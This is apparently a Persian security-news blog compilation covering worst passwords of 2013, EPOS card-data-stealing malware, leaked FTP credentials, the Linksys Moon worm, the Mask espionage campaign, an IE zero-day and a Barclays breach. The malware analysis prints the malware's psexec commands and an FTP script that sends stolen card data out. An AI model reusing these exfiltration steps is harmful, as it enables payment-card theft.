«۱۲۳۴۵۶» صدرنشین فهرست بدترین رمزهای عبور

اسپلش دیتا فهرست ۲۵ رمز عبور رایج یافت شده در اینترنت را منتشر کرد. برای اولین بار از زمانی که این شرکت اقدام به انتشار فهرست سالانه کرده است، «password» جایگاه خود را به عنوان رایج‌ترین و در نتیجه بدترین رمز عبور از دست داده و «۱۲۳۴۵۶» این جایگاه را از آن خود کرد. فهرست امسال متاثر از تعداد زیادی از رمزهای عبور کاربران آدوبی که توسط شرکت مشاوره امنیتی Stricture Consulting Group در پی رخنه امنیتی آدوبی منتشر شد، است.

مورگان اسلین مدیرعامل اسپلش دیتا می‌گوید: «دیدن رمزهای عبوری مانند ‘adobe123′ و ‘photoshop’ در این فهرست به خوبی یادآور آن است که رمزهای عبور خود را برپایه نام وبسایت‌ها یا برنامه‌های کاربردی که به آن‌ها دسترسی دارید، نگذارید.»

دیگر وجه جالب فهرست امسال آن است که با وجود آن‌که وبسایت‌ها شروع به اجرای سیاست‌های اجبار به رمزگذاری سخت‌تر کرده‌اند، رمزهای عبور عددی کوتاه بیشتری در این فهرست وجود دارد. برای مثال، برخی از رمزهای عبور ساده و قابل حدس جدید فهرست امسال عبارتند از “۱۲۳۴″ در جایگاه شانزدهم، “۱۲۳۴۵″ در جایگاه بیستم و “۰۰۰۰۰۰″ در جایگاه بیست و پنجم.

بدترین رمزهای عبور سال ۲۰۱۳ عبارتند از:

۱) ۱۲۳۴۵۶ (با یک پله صعود نسبت به سال ۲۰۱۲)

۲) password (یک پله نزول)

۳) ۱۲۳۴۵۶۷۸ (بدون تغییر)

۴) qwerty (یک پله صعود)

۵) abc123 (یک پله نزول)

۶) ۱۲۳۴۵۶۷۸۹ (جدید)

۷)۱۱۱۱۱۱ (دو پله صعود)

۸) ۱۲۳۴۵۶۷ (پنج پله صعود)

۹) iloveyou (دو پله صعود)

۱۰) adobe123 (جدید)

۱۱) ۱۲۳۱۲۳ (پنج پله صعود)

۱۲) admin (جدید)

۱۳) ۱۲۳۴۵۶۷۸۹۰ (جدید)

۱۴) letmein (هفت پله نزول)

۱۵) photoshop (جدید)

۱۶) ۱۲۳۴ (جدید)

۱۷) monkey (یازده پله نزول)

۱۸) shadow (بدون تغییر)

۱۹) sunshine (پنج پله نزول)

۲۰) ۱۲۳۴۵ (جدید)

۲۱) password1 (چهار پله صعود)

۲۲) princess (جدید)

۲۳) azerty (جدید)

۲۴) trustno1 (دوازده پله نزول)

۲۵) ۰۰۰۰۰۰ (جدید)

فهرست ۲۵ رمز عبور رایج همچنین متاثر از فایل‌های میلیون‌ها رمزعبور به سرقت رفته در سال گذشته که به صورت برخط منتشر شدند، است.

شرکت به کاربران یا کسب‌و‌کارهایی که هر یک از رمزهای عبور موجود در این فهرست را استفاده می‌کنند توصیه می‌کند هر چه سریع‌تر رمزعبور خود را عوض کنند. و همچنین توصیه‌هایی برای ساخت رمزهای عبور امن‌تر ارائه کرده:

رمزهای عبوری با هشت کاراکتر و یا بیشتر با انتخابی از انواع مختلف کاراکترها انتخاب کنید. حتی رمزهای عبوری با جایگذاری‌های رایج مانند “dr4mat1c” در مقابل فناوری به طور فزاینده پیچیده‌ی مهاجمان آسیب‌پذیر است و به خاطر آوردن ترکیب‌های تصادفی مانند “j%7K&yPx$” می‌تواند دشوار باشد.

یک راه برای ساخت رمزهای عبور امن‌تر که به خاطر آوردن آن‌ها آسان است استفاده از عبارات (کلمات کوچک با فاصله بین آن‌ها یا استفاده از سایر کاراکترها برای جدا کردن کلمات) است. بهتر است از کلمات تصادفی به جای عبارت رایج استفاده کنید. برای مثال «cakes years birthday» یا «smiles_light_skip?».

از استفاده کردن از رمزعبور/نام‌کاربری مشابه برای سایت‌های مختلف پرهیز کنید. همچنین استفاده از رمزهای عبور رایانامه، شبکه‌های اجتماعی یا سایت‌های خدمات مالی برای سایت‌های سرگرمی بسیار مخاطره آمیز است. از رمزهای عبور مختلف برای هر وبسایت جدید یا سرویسی که ثبت‌نام می‌کنید استفاده کنید. در به خاطر آوردن همه رمزهای عبور متفاوت مشکل دارید؟ از یک برنامه مدیریت رمزعبور که رمزهای عبور را سازماندهی و محافظت می‌کند استفاده کنید و به صورت خودکار به وبسایت‌ها وارد شوید.

WorstPasswords-2013

حملات EPOS Data Theft

EPOS Data Theft

نام بدافزار     EPOS Data Theft نوع بدافزار     Virus
تاریخ انتشار     2014/02/03 درجه اهمیت     کم

کارت خوانچيست؟

حملات جدیدی سامانه های الکترونیکی فروش (EPOS) را مورد تهدید قرار داده است. این حملات سامانه هایی را مورد هدف قرار می دهد که مسئولیت پردازش کارت های بانکی و اعتباری (Credit و Debit) را نیز برعهده دارند و باید اعتبار و موجودی کارت مشتری را دریافت و کنترل کنند. تمامی این سامانه های فروشگاهی از روش های رمزنگاری برای دریافت و ارسال اطلاعات کارت استفاده می کنند. با این حال اطلاعات کارت پس از دریافت باید در حافظه سیستم رمزگشایی و کنترل شود و دقیقاً در همین مرحله است که بدافزارهای کار گذاشته شده، اقدام به جمع آوری و سرقت اطلاعات می کنند.

در حملات نفوذی و سرقت اطلاعات از بدافزارهای نوع “درب مخفی” (Backdoor) و “سارق رمز عبور” (Password Stealer) و همچنین چندین ابزار دیگر مانند NetCat و PSEXEC استفاده می شود.

انتشار

در حال حاضر منبع اصلی حملات EPOS Data Theft کاملا مشخص نشده است. احتمالا با انتشار ایمیل های جعلی و فریب کاربران برای کلیک کردن روی پیوندهای مخرب در این ایمیل ها و همچنین با سوء استفاده از نقاط ضعف امنیتی و کسب دسترسی راه دور (Remote Access) به سیستم قربانیان خود، راه نفوذ باز شده و امکان نصب و فعالسازی بدافزارها فراهم می شود.

نامگذاری

نام بدافزارهایی که در حملات EPOS Data Theft مورد استفاده قرار می گیرند و تا به حال شناسایی شده اند، در زیر آمده است.

BackDoor-FBPP
PWS-FBOI
PWS-FBOJ
BackDoor-FBPL

خرابکاری

به منظور دسترسی به اطلاعات کارت ها، بدافزار بر روی سیستمی که عمل پردازش و کنترل کارتها را انجام می دهد، قرار می گیرد. سپس بدافزار تمامی پروسه های در حال اجرا بر روی سیستم را تحت نظر گرفته و منتظر اجرای دستورات مربوط به پردازش کارت می ماند. به محض اینکه بدافزار تشخیص دهد یک پردازش مالی در حال انجام است، داده های رمزگشایی شده را از حافظه کپی کرده و در یک فایل قرار می دهد. بدافزار این اطلاعات را به یک نشانی خاص ارسال می کند. 

در حملات نفوذی و سرقت اطلاعات از بدافزارهای نوع “درب مخفی” (Backdoor) و “سارق رمز عبور” (Password Stealer) و همچنین چندین ابزار دیگر مانند NetCat و PSEXEC استفاده می شود.  

EPOS Data Theft برای انجام یک حمله از چند سیستم به طور همزمان استفاده می کند. ابتدا بدافزاری که اقدام به جمع آوری اطلاعات کارتها می کند، بر روی سیستم پردازش کارتها نصب می شود. پس از سرقت، این اطلاعات در یک فایل به ظاهر از نوع DLL بصورت محلی بر روی سیستم آلوده نگهداری می شود. سپس این فایل بر روی سیستم دیگری که در همان شبکه قرار دارد کپی می گردد. همزمان بدافزاری که مسئولیت ارسال اطلاعات را برعهده دارد، بر روی یک سیستم دیگر نصب و فعال می گردد. این بدافزار وظیفه دارد تا تمام اطلاعاتی که بر روی سیستم دوم ذخیره شده را دریافت کرده و این اطلاعات را از طریق پودمان FTP به یک نشانی خارج از شبکه محلی ارسال نماید.  

نکته ی جالب در مورد این حملات، زمان بندی هوشیارانه آنها است. این حملات فقط در ساعات اداری بین ۱۰ صبح و ۵ بعدازظهر انجام می شوند تا ترافیک مربوط به این حملات در بین ترافیک عادی و روزمره شبکه مخفی مانده و باعث جلب توجه نشود.

در ادامه اطلاعات مربوط به بدافزارهایی که در این حمله مورد استفاده قرار گرفته اند، آورده شده است.

بدافزار PWS-FBOI:

این بدافزار خود را در قالب یک سرویس با نام POSWDS بر روی سیستم نصب می کند.

1

این سرویس بطور خودکار اجرا می شود و می تواند پروسه های خود را اجرا نموده و با میزکار (Desktop) در ارتباط باشد. مشخصات سرویس مذکور در تصویر زیر آمده است.

2

با توجه به کدگذاری سرویس این بدافزار، ظاهرا منشاء آن کشور روسیه است.

3

این بدافزار پروسه های در حال اجرای سیستم را کنترل نموده و به دنبال پروسه های پردازش کارتهای بانکی می گردد.

سپس بدافزار به محض پیدا کردن اطلاعات مربوط به پردازش مالی، داده های رمزگشایی شده را از حافظه برداشته و در یک فایل به ظاهر از نوع DLL در شاخه %SYSTEM% ذخیره می کند.

همچنین بدافزار، ساعت سیستم را کنترل می کند و در صورتی که ساعت بین ۱۰ صبح و ۵ بعدازظهر نباشد به مدت ۷ ساعت متوقف می شود و پس از ۷ ساعت مجددا ساعت را کنترل می کند. پس از این مرحله، بدافزار به یک نشانی IP در همان شبکه متصل شده و اطلاعات ذخیره شده را بر روی آن سیستم در شاخه <%SYSTEM%>\twain_32 در ساعات اداری کپی می کند.

این بدافزار امضای مخصوص خود را دارد که بصورت (KAPTOXA (Kar-Toe-Sha می باشد و نشانه ای از ارتباط آن با کشور روسیه است. 

5

تمامی دستورات مربوط به این بدافزار رمزنگاری شده هستند و هنگام نیاز در حافظه رمز گشایی می شوند.

6

بدافزار BackDoor-FBPL:

این بدافزار خود را در قالب یک سرویس با نام BladeLogic بر روی سیستم نصب می کند و با هر بار راه اندازی مجدد سیستم بصورت خودکار اجرا می شود.

7

۱- بدافزار پس از نصب دستورات زیر را اجرا میکند.

 C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\ -u -p cmd /c “taskkill /IM bladelogic.exe /F”
 C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\ -u -p -d bladelogic

2- این بدافزار نیز تنها در ساعات اداری فعالیت می کند تا در میان فعالیت های معمولی سیستم مخفی بماند.
۳- در ساعات مذکور دستورات زیر توسط بدافزار روی سیستم اجرا می شوند.

C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\ -u -p cmd /c “taskkill /IM bladelogic.exe /F”
 C:\WINDOWS\system32\cmd.exe /c move \\\NT\.dll C:\Test\data_2014_1_16_15_15.txt

4- سپس داده های زیر در فایل Cmd.txt نوشته می شوند.

open


cd 001
bin
send C:\Test\data_2014_1_16_15_15.txt
quit

و دستور زیر اجرا می شود.

C:\WINDOWS\system32\cmd.exe /c ftp -s:C:\Test\cmd.txt > C:\Test\out.txt

5- سپس داده های زیر در فایل Cmd.txt نوشته می شوند:

open


cd etc
bin
send C:\Test\data_2014_1_16_15_15.txt
quit

و دستور زیر اجرا می شود:

C:\WINDOWS\system32\cmd.exe /c ftp -s:C:\Test\cmd.txt > C:\Test\out.txt

6- سپس بدافزار به خواب می رود (متوقف می شود) تا در بازه زمانی بعدی، مجددا مراحل ۴ تا ۶ را انجام دهد. تمامی دستورات بالا و اطلاعاتی که بدافزار استفاده می کند، رمزنگاری شده اند و هنگام نیاز در حافظه رمزگشایی می شوند. در تصویر زیر برخی از داده های رمزنگاری و رمزگشایی شده، نمایش داده شده است.

8

نشانی IP سیستمی که قرار است بدافزار PWS-FBOI اطلاعات سرقت شده را بر روی آن ذخیره کند و همچنین مشخصات پودمان FTP مورد استفاده سیستم، از قبل در داده های رمزنگاری شده بدافزار وجود دارند. این موضوع نشان می دهد که هر نمونه از این بدافزار مخصوص به یک حمله هدف گذاری شده و خاص می باشد.

بطور خلاصه، شکل زیر مراحل اجرای حملات EPOS Data Theft را نشان می دهد.

9

پيشگيری

به روز نگه داشتن ضدويروس و نصب تمامی اصلاحيه های سيستم عامل، در کنار آگاه کردن کاربران درخصوص خطر کليک بر روی پیوندهای ناآشنا و باز کردن هرزنامه ها، همگی می توانند خطر آلوده شدن به اين بدافزار و يـا گونه های مشابه را به حداقل برسانند.

افشای نام کاربری و رمز عبور هزاران سرور FTP

 

ftpفهرستی حاوی مجوزهای دسترسی به بیش از ۷ هزار سرور FTP در تالارهای گفتگوی زیرزمینی و بین نفوذگران منتشر شده است. در برخی موارد نفوذگران با اتصال به این سرورها، فایلهای آلوده از جمله اسکریپت های نوشته شده به زبان PHP را بر روی آنها کپی کرده اند. در موارد دیگر مشاهده شده است که نفوذگران با قرار دادن فایل هایی بر روی این سرورها از آنها برای تغییر جهت کاربران به سایت های مخرب استفاده نموده اند.

سرور FTP روزنامه The New York Times یکی از سرورهایی است که مجوز دسترسی به آن از طریق این فهرست به دست نفوذگران افتاده است. مسئولان این روزنامه اعلام کرده اند که در حال بررسی موضوع و رفع مشکلات ایجاد شده می باشند.

UNICEF سازمان دیگری است که مجوز دسترسی به سرورهای FTP آن، در فهرست نفوذگران مشاهده می شود. با این حال گفته می شود بخش FTP این سازمان که مدتهاست که از آن استفاده نمی شود، اکنون غیرفعال شده است. همچنین سخنگوی UNICEF اعلام کرده است که با توجه به ساختار امن این سازمان نفوذ به آن بسیار دور از انتظار خواهد بود.

هر چند که تمامی نام های کاربری و رمزهای عبور در فهرست معتبر نیستند اما بسیاری از آنها همچنان قابل استفاده می باشند. اکثر این رمزهای عبور پیچیده می باشند و بنابراین احتمال جمع آوری این اطلاعات با روش سعی و خطا (Brute-force) را می توان منتفی دانست. به نظر می رسد که این نام های کاربری و رمزهای عبور از طریق بدافزارهایی که بر روی سیستم های آلوده این سازمانها نصب بودند، جمع آوری شده اند.  

سرورهای FTP انباره های آنلاینی هستند که کاربران با وارد کردن نام کاربری و رمز عبور قادرند بر روی آنها فایل قرار داده یا از روی آنها فایل دریافت کنند. نرم افزار رایج برای دسترسی به این انباره ها، مرورگرها می باشند.

دسترسی به سرورهای FTP از طریق “ابر-پیوند”هایی که نام کاربری و و رمز عبور در آنها گنجانده شده باشد با یک کلیک امکان پذیر است. بنابراین نفوذگران با ایجاد ابر-پیوندهایی که به فایل های آلوده بر روی سرورهای مجاز اشاره می کنند و درج آنها در هرزنامه ها، کابران را فریب می دهند و یا وسوسه می کنند تا با کلیک بر روی پیوندها، فایل های مخرب را اجرا کنند. برای نمونه، در رویداد مربوط به The New York Times، نفوذگران با قرار دادن یک فایل HTML آلوده بر روی سرور آن روزنامه، اقدام به ایجاد ابر-پیوندی کرده بودند که در ظاهر به یکی از فایلهای روی سرور FTP اشاره می کرد؛ اما در واقعیت با کلیک بر روی آن سایت مخربی با تبلیغاتی تقلبی باز می شد.

ارسال فایل از سرورهای FTP به سرورهای وب که میزبانی سایت های اینترنتی را برعهده دارند، امری عادی است. لذا احتمال می رود که نفوذگران با دستکاری فایلهای ارسالی از سرورهای FTP، بتوانند محتوای سایت ها را هم تغییر دهند.

هنوز مشخص نیست چه شخص یا گروهی مسئول جمع آوری این فهرست بوده است.


مراقب روترهای آلوده Linksys باشید

یک بدافزار جدید با سوءاستفاده از نقطه ضعفی در بخش احراز هویت در روترهای شرکت Linksys توانسته به این تجهیزات نفوذ کرده و آنها را آلوده کند. روترهای سری E-Series هدف اصلی این بدافزار است. 

ابتدا کارشناسان موسسه SANS بودند که درباره رفتار غیرمتعارف روترهای E1000 و E1200 شرکت Linksys هشدار دادند. براساس مشاهدات این کارشناسان، روترها اقدام به اسکن نشانی های IP بر روی درگاه های ۸۰ و ۸۰۸۰ می کردند. تحقیقات بیشتر نشان داد بدافزار جدیدی که قادر به نفوذ به این روترها شده است، عامل اصلی این رفتار غیرعادی است. این بدافزار پس از رخنه به روترها از این تجهیزات برای شناسایی تجهیزات آسیب پذیر دیگر در شبکه سوءاستفاده می کرده است.  

برای این بدافزار جدید نام Moon انتخاب شده است. در برنامه این بدافزار علامت یک شرکت تخیلی به نام Lunar Industries از فیلم سینمایی The Moon مشاهده شده است.

بدافزار Moon ابتدا یک درخواست براساس پودمان HNAP یا Home Network Administration Protocol به نشانی های IP که اسکن کرده است، می فرستد. پودمان HNAP توسط شرکت Cisco ابداع شده و از آن برای شناسایی، تنظیم و مدیریت تجهیزات شبکه استفاده می شود.  

بدافزار Moon درخواست HNAP را می فرستد تا بتواند مدل روترهای دیگر را شناسایی کند و متوجه شود که آیا آن روترها آسیب پذیر هستند و آیا می توان از نقاط ضعف آنها برای نفوذ سوءاستفاده کرد یا خیر. در صورت مناسب تشخیص دادن یک روتر، بدافزار Moon یک درخواست دیگر به یک CGI Script فعال بر روی آن روتر می فرستد تا امکان اجرای فرمان های محلی بر روی دستگاه فراهم شود. با توجه به اینکه نقطه ضعف مورد سوء استفاده بدافزار Moon مربوط به بخش احراز هویت می شود، ماهیت دقیق این CGI Script منتشر نشده است. 

بدافزار Moon با سوءاستفاده از این نقطه ضعف یک فایل اجرایی با قالب ELF یا Executable And Linkable Format را بر روی روترهای آسیب پذیری که شناسایی کرده، دریافت و اجرا می کند. پس از آن، این روترها نیز شروع به جستجوی روترهای آسیب پذیر بیشتری می کنند.  

این فایل اجرایی ELF حاوی ۶۷۰ بازه از نشانی های IP است که عمدتا توسط شرکتهای سرویس دهنده اینترنت در کشورهای مختلف برای سرویس های Cable یا DSL استفاده می شوند.

در حال حاضر مشخص نیست که هدف بدافزار Moon به غیر از انتشار و آلودگی بیشتر روترهای Linksys، چیست. ارتباط این بدافزار با یک مرکز فرماندهی و کنترل می تواند علامتی از یک شبکه مخرب Botnet باشد که با استفاده از روترهای تسخیر شده (Bot) برای انجام عملیات مخرب هماهنگ و برنامه ریزی شده ای در آینده، تشکیل شده است.  

شرکت Linksys وجود نقطه ضعفی که توسط بدافزار Moon مورد سوءاستفاده قرار گرفته را تائید و اعلام کرده که به زودی اصلاحیه ای برای رفع آن منتشر خواهد کرد.

لازم به توضیح است که تنها بر روی روترهایی که برای مدیریت از راه دور تنظیم شده اند، امکان سوءاستفاده از نقطه ضعف و انتشار بدافزار Moon وجود دارد.

هر آنچه که درباره عملیات جاسوسی Mask باید بدانید

Maskmask نام عملیات جاسوسی گسترده ای است که از سال ۲۰۰۷ میلادی در جریان بوده است. عاملی که عملیات Mask را بااهمیت می کند، پیچیدگی ابزارهایی است که در این عملیات بکار گرفته شده است. ابزارهایی نظیر یک بدافزار پیشرفته، یک Rootkit و یک Bootkit که همگی دارای نسخه های اختصاصی برای Linux ،Mac OS X ،Windows و Android هستند. 

در ضمن، عملیات جاسوسی Mask، سیستم هایی را که از نسخه های قدیمی ضدویروس Kaspersky استفاده می کنند، هدف ویژه قرار داده و از یک نقطه ضعف در این ضدویروس برای مخفی کردن خود بر روی سیستم قربانی سود می برد. 

پیچیدگی و تنوع عملیاتی که Mask قادر به انجام آنها هست، این فرضیه را قوت می بخشد که یک دولت با امکانات فنی، مالی و انسانی گسترده پشت این عملیات جاسوسی بوده است.

map

چرا نام Mask؟

Mask ترجمه انگلیسی کلمه Careto در زبان اسپانیانی است. Careto به معنی ماسک یا چهره زشت است. کلمه Careto به دفعات در فایل های مختلف و مرتبط با این عملیات جاسوسی بکار رفته و قابل مشاهده است.

code

قربانیان عملیات Mask

سیستم هایی که مورد حمله و نفوذ Mask قرار گرفته اند، در حوزه های زیر شناسایی شده اند:

- نهادهای دولتی
- سفارتخانه ها
- شرکت ها و مراکز نفت، گاز و پتروشیمی
- مراکز تحقیقاتی
- شرکت های خصوصی مالی و سرمایه گذاری
- فعالان سیاسی و اجتماعی

آمار قربانیان Mask

گرچه آمار دقیق و کاملی در دسترس نیست ولی تاکنون بیش از یک هزار نشانی IP آلوده در ۳۱ کشور شناسایی شده است. از جمله این کشورها، می توان به الجزایر، آرژانتین، بلژیک، بولیوی، برزیل، چین، کوبا، مصر، فرانسه، آلمان، عراق، لیبی، مالزی، پاکستان، نروژ، سوئیس، ترکیه، انگلیس، آمریکا، ونزوئلا و همچنین ایران اشاره کرد.

یک هزار نشانی IP آلوده متعلق به ۳۸۰ مرکز، شرکت و موسسه می باشند.

chart

باید توجه داشت که این آمار از تعدادی سرور فرماندهی Mask که شناسایی شده اند و همچنین از تعدادی سرور فرماندهی دروغینی که توسط شرکت های امنیتی برای جمع آوری اطلاعات راه اندازی شده اند، به دست آمده است.  

Mask چکار می کند؟

آلودگی به Mask می تواند عواقب شدیدی به همراه داشته باشد. تمام ارتباطات سیستم آلوده کنترل و اطلاعات گوناگونی از سیستم آلوده جمع آوری می شود.

شناسایی فایل های مخرب و مرتبط با Mask به دلیل استفاده از فناوری های Rootkit بسیار دشوار است. همچنین علاوه بر ساختار اولیه Mask، گردانندگان این عملیات می توانند امکانات و تنظیمات جدیدی به Mask اضافه کنند تا مشخصات و رفتار Mask دائما در حال تغییر و دگرگونی باشد.  

نحوه آلودگی Mask 

بخش عمده آلودگی های مشاهده شده از طریق ایمیل های مخرب و هدفمند بوده است. این ایمیل ها برای هریک از قربانیان بطور اختصاصی ساخته شده اند تا کاملا واقعی و مرتبط با فعالیت های قربانی به نظر آید.  

در این ایمیل های جعلی، پیوند (Link) هایی وجود دارد که قربانی را به سایت های مخرب هدایت می کند. در این سایت ها از نقاط ضعف مختلف بر روی سیستم قربانی سوءاستفاده می شود تا بدافزار موردنظر به سیستم قربانی نفوذ کرده و بر روی آن فعال گردد. پس از آلوده شدن سیستم، قربانی به یک سایت خبری عادی و سالم و یا یک فیلم بر روی سایت YouTube هدایت می شود.

باید توجه داشت که سایت مخربی که قربانی به آن هدایت می شود، مستقیما برای نفوذ و آلودگی سیستم بکار گرفته نشده است. بلکه ابزارهای نفوذ در شاخه های خاصی از سایت یا حتی در سایت های زیرمجموعه (sub-domain) سایت اصلی قرار دارند. نشانی این شاخه ها و یا سایت های زیر مجموعه در هیچ کجا ذکر نشده اند و نشانی آنها فقط در پیوند داخل ایمیل وجود دارد.   

آیا Mask از نقاط ضعف امنیتی ناشناخته و جدید استفاده می کند؟

بر اساس اطلاعاتی که تاکنون به دست آمده، Mask از یک نقطه ضعف شناخته شده و قدیمی در نرم افزار Adobe Flash Player به دفعات برای نفوذ به سیستم قربانیان خود، سوءاستفاده کرده است.   

این نقطه ضعف که دارای شناسه CVE-2013-0773 است در نسخه های قدیمی تر از ۱۰٫۳ و ۱۱٫۲ در نرم افزار Flash Player وجود داشته است.

نکته بسیار جالب درباره این نقطه ضعف، نحوه کشف آن است. شرکت فرانسوی VUPEN در مسابقات نفوذ Pwn2Own که هرساله همزمان با کنفرانس امنیتی CanSecWest برگزار می شود، برای اولین بار از این نقطه ضعف برای دور زدن امکان امنیتی Sandbox در مرورگر Chrome استفاده کرد. در آن زمان، شرکت VUPEN از افشای جزئیات این نقطه ضعف خودداری کرد و اعلام نمود که این نقطه ضعف را به معرض فروش خواهد گذاشت. اکنون به نظر می رسد که گردانندگان Mask این نقطه ضعف را خریداری کرده اند.  

علاوه بر سوءاستفاده از نقطه ضعف Flash Player برای نفوذ به سیستم قربانی، از روش های فریبکارانه برای وسوسه و گمراه کردن قربانیان نیز استفاده شده است. نظیر ترغیب کاربر به دریافت و نصب فایل های به روز رسانی Java و یا دریافت و نصب افزونه (add-ons) جدید برای مرورگر Chrome.

Mask بر روی چه سیستم هایی عمل می کند؟

تاکنون نسخه هایی از بدافزارهای Mask برای محیط های Windows و Mac OS X مشاهده شده است. همچنین بر روی سرورهای فرماندهی Mask، افزونه هایی خاص محیط های Linux شناسایی شده اند ولی تاکنون این افزونه ها بر روی سیستم های آلوده مشاهده نشده اند. بعلاوه، در فایل های Log بر روی سرورهای فرماندهی نشانه هایی از فعالیت بر روی سیستم های Apple iOS و Android گزارش شده است. 

ادامه نوشته

یک سوم کاربران مرورگر IE در معرض خطر حملات نفوذی هستند

روز پنجشنبه ۲۴ بهمن ماه، شرکت مایکروسافت تائید کرد که نسخه های ۹ و ۱۰ مرورگر Internet Explorer هم اکنون تحت حملات نفوذی قرار دارند و نفوذگران از یک نقطه ضعف امنیتی جدید و تابحال ناشناخته برای حملات خود سوء استفاده می کنند. کاربران نسخه های ۹ و ۱۰ مرورگر IE بیش از یک سوم کاربران این مرورگر را تشکیل می دهند.

شرکت مایکروسافت ضمن تائید حملات نفوذی محدود علیه کاربران مرورگرهای IE9 و IE10 به آنان توصیه کرد تا هرچه زودتر اقدام به ارتقاء مرورگر خود به نسخه IE11 نمایند. البته کاربران سیستم عامل Vista قادر به انجام اینکار نبوده و همچنان مجبور به استفاده از نسخه آسیب پذیر IE9 خواهند بود. خوشبختانه کمتر از ۴ درصد کاربران Windows در جهان همچنان از نسخه Vista استفاده می کنند. راه حل دیگر برای این کاربران می تواند تغییر مرورگر خود از IE به مرورگرهایی نظیر Chrome و  Firefox باشد.

ابتدا شرکت امنیتی FireEye بود که حملات نفوذی از طریق این نقطه ضعف جدید و تابحال ناشناخته در مرورگر IE10 را گزارش کرد. به دنبال آن، شرکت امنیتی Websense نیز اعلام کرد که شواهدی در دست دارد که نشان می دهد این حملات از سه هفته پیش آغاز شده است. طبق اظهار Websense حملات اولیه عمدتاً علیه سایت “اتحادیه هوا و فضا فرانسه” صورت گرفته است.

کشف و سوء استفاده از این نقطه ضعف جدید به فاصله کمتر از دو روز پس از انتشار اصلاحیه حیاتی ماهانه برای مرورگر IE که ۲۴ نقطه ضعف مختلف را در این مرورگر برطرف میکند، برای مایکروسافت چندان خوشایند نیست. شرکت مایکروسافت هنوز راه حلی برای ترمیم این نقطه ضعف جدید یا روشی برای مقابله با سوءاستفاده از آن ارائه نکرده است. همچنین معلوم نیست که آیا مایکروسافت مجبور به انتشار اصلاحیه فوق العاده و خارج از برنامه ماهانه خود خواهد شد یا نزدیک به یک ماه صبر خواهد کرد تا در نوبت ماهانه بعد، اصلاحیه ای برای این نقطه ضعف منتشر کند.

سرقت اطلاعات حساب ۲۷,۰۰۰ مشتری بانک بارکلیز و فروش آنها


بانک معروف چند ملیتی انگلیسی ادعا می‌کند اطلاعات شخصی و مالی به سرقت رفته‌ی ۲۷۰۰۰ مشتری این بانک به دلالان فروخته شده است.

این مطلب روز یکشنبه توسط دیلی میل منتشر شده و اطلاعات جزئی (نمونه‌ای از فایل‌های دزدی) توسط افشاگری که قصد داشت مشتریان آسیب دیده را آگاه کند ارائه شده است.

رکوردهای به سرقت رفته حاوی نام مشتریان، تاریخ تولد، شماره بیمه ملی، آدرس، شماره تلفن، شماره پاسپورت، وضعیت اشتغال، شغل، حقوق، اطلاعات مشروح وضعیت مالی و همچنین اطلاعاتی در زمینه وضعیت سلامت و علایق شخصی آن‌ها است.

این افشاگر (یک دلال سابق کالا) می‌گوید هر رکورد قیمتی حدود ۵۰ پوند ( ۸۲ دلار) داشته و بسیاری از دلالان تصمیم به خرید تعدادی از فایل‌ها گرفته‌اند.

افشاگر از وجود این فایل‌ها در سپتامبر ۲۰۱۳ هنگامی که رئیس شرکت دلالی که برای آن کار می‌کرد از او خواست فایل‌ها را به قیمت ۸ پوند به ازای هر فایل به دیگر دلال‌ها به فروش رساند آگاه شد. ظاهرا، این شرکت از دسامبر ۲۰۱۲ شروع به استفاده از این فایل‌ها کرده، بنابراین این یک رخنه قدیمی است.

هنوز مشخص نیست رکوردها چگونه به سرقت رفته‌اند و احتمال آن‌که کار یک نیروی داخلی باشد وجود دارد. بانک تحقیقات خود را پس از انتشار این گزارش توسط دیلی میل آغاز کرد. عدم مشکوک شدن بانک به چنین رخداد امنیتی مهم و تبعات آن پس از گذشت مدت طولانی، غیر قابل باور است. جریان هر چه باشد، آن‌ها اکنون در حال تحقیقات هستند و پس از ارزیابی وضعیت سریعا با کمیساریای اطلاعات و دیگر تنظیم کننده‌ها تماس گرفته‌اند.

نتایج اولیه حاکی از آن است که اطلاعات به سرقت رفته متعلق به مشتریان مرتبط به برنامه‌ریزی مالی بانک که در سال ۲۰۱۱ پایان یافت، است.

مشتریان آسیب دیده به طور مستقیم از خطرات آگاه خواهند شد و سوال این است که بانک چقدر به دلیل عدم محافظت از اطلاعات جریمه خواهد شد و این چه تاثیری بر اعتماد مشتریان خواهد داشت

دوره ECSA



تست نفوذ و مفاهیم آن از جمله مواردی است که از دغدغه های شبکه های امروزی محسوب می گردد.

به طور خلاصه یک متخصص امنیت خود را در قالب یک نفوذ گر قرار داده و با استفاده از ابزارها و دانش خود تمامی نقاط ارتباطی شبکه را تحلیل می نماید در کل نتایج مشاهدات خود را در چهارچوب یک گزارش جامع ارائه کرده و راه حل های مورد نیاز را متذکر می گردد.

سر فصلهای این دوره :

1-The Need for Security Analysis
2-Advanced Googling
3-Advanced Sniffing Techniques
4-Vulnerability Analysis with Nessus
5-Snort Analysis
6-Penetration Testing Methodologies
7-Vulnerability Analysis
8-Penetration Testing Report and Documentation Writing

از یادآوری مطلب جناب آقای امیر مرادی کمال تشکر را دارم.

دوره نفوذ به شبکه در غالب یک هکر قانونمند

ceh

این دوره از معروفترین و پر طرفدار ترین دوره های امنیت می باشد در این دوره نفوذ به شبکه در غالب یک هکر قانونمند تعریف و بررسی شده و با دیدی گسترده تر حملات و تهدیدها شناسایی و موشکافی میگردد. دانشجویان در این دوره با ابزارهای متنوعی روبرو می شوند و با تست آنها درک مناسبی از آسیبهای رودررو در شبکه ها را پیدا می کنند.

سر فصلهای این دوره :

1-FOOTPRINTING & RECONNAISANCE
2-SCANNING
3-ENUMERATION
4-TROJANS AND BACKDOOR
5-SNIFFERS
6-SOCIAL ENGINEERING
7-SESSION HIJACK
8-SQL Injection
9-Evading IDS, Firewalls, and Honeypots
10- Buffer Overflow
11- Cryptography

معرفی دوره های امنیت

security

این دوره شامل مبانی اولیه در مبحث امنیت می باشد.

دانستن اطلاعات و اصطلا حات اولیه از جمله اهداف این دوره است.

در ابتدا مباحث تئوریک مورد بحث قرار گرفته و با تشریح لزوم امن بودن شبکه ها ادامه می یابد سپس حملات رایج در شبکه ها تشریح شده و انواع آن معرفی می گردد در این علم دانستن اصول اولیه شبکه از اهمیت بالایی برخوردار است .بدین جهت ارائه این دوره در ابتدا مطرح گردیده است.

سر فصلهای این دوره :

1-Network Design
2-Attacks
3-Application Security
4-Data Security
5-Access Control and Account Management
6-Public Key Infrastructure

مانیتورنیگ کمیت های فیزیکی در مراکز داده

